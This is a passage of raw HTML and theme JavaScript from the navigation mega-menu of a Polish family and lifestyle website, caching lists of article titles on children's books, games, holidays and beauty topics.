td-module-title\"><a href=\"http:\/\/www.erodzina.com\/niezwykla-lektura-dla-mlodych-milosnikow-przygod-explorer-academy-tajemnica-mglawicy\/\" rel=\"bookmark\" title=\"Niezwyk\u0142a lektura dla m\u0142odych mi\u0142o\u015bnik\u00f3w przyg\u00f3d &#8211; \u201eExplorer Academy. Tajemnica mg\u0142awicy\u201d\">Niezwyk\u0142a lektura dla m\u0142odych mi\u0142o\u015bnik\u00f3w przyg\u00f3d &#8211; \u201eExplorer Academy. Tajemnica mg\u0142awicy\u201d<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-16T20:46:45+00:00\" >16 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_54_5c5e20b7a414d","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_54_5c5e20b7a414d));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 60;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jakie-gry-na-konsole-dla-dzieci-wybierac\/\" rel=\"bookmark\" title=\"Jakie gry na konsole dla dzieci wybiera\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/jakiegrynakonsoledladzieciwybierac2-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jakie gry na konsole dla dzieci wybiera\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/twoja-rozrywka\/\" class=\"td-post-category\">Twoja rozrywka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jakie-gry-na-konsole-dla-dzieci-wybierac\/\" rel=\"bookmark\" title=\"Jakie gry na konsole dla dzieci wybiera\u0107?\">Jakie gry na konsole dla dzieci wybiera\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-03T15:44:31+00:00\" >3 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/wybierz-sklep-z-samouczkami-rzezbiarskimi\/\" rel=\"bookmark\" title=\"Wybierz sklep z samouczkami rze\u017abiarskimi\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/sam01-opak_cil4_v2-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/sam01-opak_cil4_v2-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/sam01-opak_cil4_v2-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/sam01-opak_cil4_v2-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Wybierz sklep z samouczkami rze\u017abiarskimi\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/twoja-rozrywka\/\" class=\"td-post-category\">Twoja rozrywka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/wybierz-sklep-z-samouczkami-rzezbiarskimi\/\" rel=\"bookmark\" title=\"Wybierz sklep z samouczkami rze\u017abiarskimi\">Wybierz sklep z samouczkami rze\u017abiarskimi<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-21T16:08:05+00:00\" >21 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/wszystko-co-musisz-wiedziec-o-tarocie\/\" rel=\"bookmark\" title=\"Wszystko co musisz wiedzie\u0107 o tarocie\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/5e772b43a9e18dde7194b7eab27f87c2-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/5e772b43a9e18dde7194b7eab27f87c2-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/5e772b43a9e18dde7194b7eab27f87c2-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/5e772b43a9e18dde7194b7eab27f87c2-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Wszystko co musisz wiedzie\u0107 o tarocie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/twoja-rozrywka\/\" class=\"td-post-category\">Twoja rozrywka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/wszystko-co-musisz-wiedziec-o-tarocie\/\" rel=\"bookmark\" title=\"Wszystko co musisz wiedzie\u0107 o tarocie\">Wszystko co musisz wiedzie\u0107 o tarocie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-06T14:14:25+00:00\" >6 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_54_5c5e20b7a414d","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_54_5c5e20b7a414d));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 77;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ubezpieczenie-na-narty-w-drodze-i-na-stoku\/\" rel=\"bookmark\" title=\"Ubezpieczenie na narty \u2013 w drodze i na stoku\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/02\/ubezpieczenienanarty-wdrodzeinastoku1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ubezpieczenie na narty \u2013 w drodze i na stoku\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/wakacje-i-urlop\/\" class=\"td-post-category\">Wakacje i urlop<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ubezpieczenie-na-narty-w-drodze-i-na-stoku\/\" rel=\"bookmark\" title=\"Ubezpieczenie na narty \u2013 w drodze i na stoku\">Ubezpieczenie na narty \u2013 w drodze i na stoku<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-02-03T15:37:01+00:00\" >3 lutego 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/pomysly-na-ferie-zimowe-z-dziecmi\/\" rel=\"bookmark\" title=\"Pomys\u0142y na ferie zimowe z dzie\u0107mi\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/pomyslynaferiezimowezdziecmi1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/pomyslynaferiezimowezdziecmi1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/pomyslynaferiezimowezdziecmi1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/pomyslynaferiezimowezdziecmi1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Pomys\u0142y na ferie zimowe z dzie\u0107mi\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/wakacje-i-urlop\/\" class=\"td-post-category\">Wakacje i urlop<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/pomysly-na-ferie-zimowe-z-dziecmi\/\" rel=\"bookmark\" title=\"Pomys\u0142y na ferie zimowe z dzie\u0107mi\">Pomys\u0142y na ferie zimowe z dzie\u0107mi<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-03T12:04:31+00:00\" >3 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/najlepszy-urlop-w-zakopanem\/\" rel=\"bookmark\" title=\"Najlepszy urlop w Zakopanem\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/2944b912adf698e685c0cc4ce7795382-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/2944b912adf698e685c0cc4ce7795382-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/2944b912adf698e685c0cc4ce7795382-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/2944b912adf698e685c0cc4ce7795382-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Najlepszy urlop w Zakopanem\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/rozrywka-i-hobby\/wakacje-i-urlop\/\" class=\"td-post-category\">Wakacje i urlop<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/najlepszy-urlop-w-zakopanem\/\" rel=\"bookmark\" title=\"Najlepszy urlop w Zakopanem\">Najlepszy urlop w Zakopanem<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-29T11:37:20+00:00\" >29 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_54_5c5e20b7a414d","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_54_5c5e20b7a414d_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_54_5c5e20b7a414d"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_54_5c5e20b7a414d" id="td_uid_55_5c5e20b7a43b0" data-td_block_id="td_uid_54_5c5e20b7a414d" data-td_filter_value="56" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/kacik-dziecka/">Kącik dziecka</a><a class="mega-menu-sub-cat-td_uid_54_5c5e20b7a414d" id="td_uid_56_5c5e20b7a43df" data-td_block_id="td_uid_54_5c5e20b7a414d" data-td_filter_value="82" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/komputer-i-internet/">Komputer i Internet</a><a class="mega-menu-sub-cat-td_uid_54_5c5e20b7a414d" id="td_uid_57_5c5e20b7a4406" data-td_block_id="td_uid_54_5c5e20b7a414d" data-td_filter_value="71" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/konkursy/">Konkursy</a><a class="mega-menu-sub-cat-td_uid_54_5c5e20b7a414d" id="td_uid_58_5c5e20b7a442b" data-td_block_id="td_uid_54_5c5e20b7a414d" data-td_filter_value="55" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/">Książki i magazyny</a><a class="mega-menu-sub-cat-td_uid_54_5c5e20b7a414d" id="td_uid_59_5c5e20b7a444e" data-td_block_id="td_uid_54_5c5e20b7a414d" data-td_filter_value="60" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/twoja-rozrywka/">Twoja rozrywka</a><a class="mega-menu-sub-cat-td_uid_54_5c5e20b7a414d" id="td_uid_60_5c5e20b7a4471" data-td_block_id="td_uid_54_5c5e20b7a414d" data-td_filter_value="77" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/wakacje-i-urlop/">Wakacje i urlop</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_54_5c5e20b7a414d mega-menu-cat-all" id="td_uid_61_5c5e20b7a4493" data-td_block_id="td_uid_54_5c5e20b7a414d" data-td_filter_value="" href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/">Wszystko Rozrywka i Hobby</a></div></div><div id="td_uid_54_5c5e20b7a414d" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/ksiazki-dla-dzieci-nie-tylko-polsku/" rel="bookmark" title="Książki dla dzieci nie tylko polsku"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/02/główne_Big-Fish-Little-Fish-boSPREAD-1-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Książki dla dzieci nie tylko polsku"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/ksiazki-i-magazyny/" class="td-post-category">Książki i magazyny</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/ksiazki-dla-dzieci-nie-tylko-polsku/" rel="bookmark" title="Książki dla dzieci nie tylko polsku">Książki dla dzieci nie tylko polsku</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-04T16:20:34+00:00">4 lutego 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/jakie-gry-na-konsole-dla-dzieci-wybierac/" rel="bookmark" title="Jakie gry na konsole dla dzieci wybierać?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/02/jakiegrynakonsoledladzieciwybierac2-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/02/jakiegrynakonsoledladzieciwybierac2-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/02/jakiegrynakonsoledladzieciwybierac2-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/02/jakiegrynakonsoledladzieciwybierac2-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Jakie gry na konsole dla dzieci wybierać?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/twoja-rozrywka/" class="td-post-category">Twoja rozrywka</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/jakie-gry-na-konsole-dla-dzieci-wybierac/" rel="bookmark" title="Jakie gry na konsole dla dzieci wybierać?">Jakie gry na konsole dla dzieci wybierać?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-03T15:44:31+00:00">3 lutego 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/ubezpieczenie-na-narty-w-drodze-i-na-stoku/" rel="bookmark" title="Ubezpieczenie na narty – w drodze i na stoku"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/02/ubezpieczenienanarty-wdrodzeinastoku1-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/02/ubezpieczenienanarty-wdrodzeinastoku1-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/02/ubezpieczenienanarty-wdrodzeinastoku1-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/02/ubezpieczenienanarty-wdrodzeinastoku1-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Ubezpieczenie na narty – w drodze i na stoku"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/rozrywka-i-hobby/wakacje-i-urlop/" class="td-post-category">Wakacje i urlop</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/ubezpieczenie-na-narty-w-drodze-i-na-stoku/" rel="bookmark" title="Ubezpieczenie na narty – w drodze i na stoku">Ubezpieczenie na narty – w drodze i na stoku</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-03T15:37:01+00:00">3 lutego 2019</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_54_5c5e20b7a414d" data-td_block_id="td_uid_54_5c5e20b7a414d"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_54_5c5e20b7a414d" data-td_block_id="td_uid_54_5c5e20b7a414d"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-5106"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/" class="sf-with-ul">Uroda<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_62_5c5e20b7aa09a = new tdBlock();
block_td_uid_62_5c5e20b7aa09a.id = "td_uid_62_5c5e20b7aa09a";
block_td_uid_62_5c5e20b7aa09a.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"10","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_62_5c5e20b7aa09a_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_62_5c5e20b7aa09a_rand","tdc_css_class_style":"td_uid_62_5c5e20b7aa09a_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_62_5c5e20b7aa09a.td_column_number = "3";
block_td_uid_62_5c5e20b7aa09a.block_type = "td_block_mega_menu";
block_td_uid_62_5c5e20b7aa09a.post_count = "3";
block_td_uid_62_5c5e20b7aa09a.found_posts = "369";
block_td_uid_62_5c5e20b7aa09a.header_color = "";
block_td_uid_62_5c5e20b7aa09a.ajax_pagination_infinite_stop = "";
block_td_uid_62_5c5e20b7aa09a.max_num_pages = "123";
tdBlocksArray.push(block_td_uid_62_5c5e20b7aa09a);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_62_5c5e20b7aa09a));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ktora-bizuteria-okaze-sie-najlepszym-wyborem\/\" rel=\"bookmark\" title=\"Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hand-3938729_960_720-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/moda-i-uroda\/\" class=\"td-post-category\">Moda i uroda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ktora-bizuteria-okaze-sie-najlepszym-wyborem\/\" rel=\"bookmark\" title=\"Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?\">Kt\u00f3ra bi\u017cuteria oka\u017ce si\u0119 najlepszym wyborem?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-31T14:04:55+00:00\" >31 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/5-sposobow-na-hipnotyzujace-rzesy\/\" rel=\"bookmark\" title=\"5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/hipnotyzujace-rzesy-isadora-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/kosmetyki\/\" class=\"td-post-category\">Kosmetyki<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/5-sposobow-na-hipnotyzujace-rzesy\/\" rel=\"bookmark\" title=\"5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy\">5 sposob\u00f3w na hipnotyzuj\u0105ce rz\u0119sy<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-29T17:12:41+00:00\" >29 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/urzekajacy-makijaz-wieczorowy-jak-go-zrobic\/\" rel=\"bookmark\" title=\"Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/fotolia_224482616_subscription_monthly_m-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/skora-i-wlosy\/\" class=\"td-post-category\">Sk\u00f3ra i w\u0142osy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/urzekajacy-makijaz-wieczorowy-jak-go-zrobic\/\" rel=\"bookmark\" title=\"Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?\">Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-20T14:32:08+00:00\" >20 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_62_5c5e20b7aa09a","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_62_5c5e20b7aa09a));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 76;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/byc-zadowolona-z-wlasnego-wygladu\/\" rel=\"bookmark\" title=\"By\u0107 zadowolon\u0105 z w\u0142asnego wygl\u0105du\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/woman-3083390_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/woman-3083390_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/woman-3083390_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/woman-3083390_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"By\u0107 zadowolon\u0105 z w\u0142asnego wygl\u0105du\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/chirurgia-plastyczna\/\" class=\"td-post-category\">Chirurgia plastyczna<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/byc-zadowolona-z-wlasnego-wygladu\/\" rel=\"bookmark\" 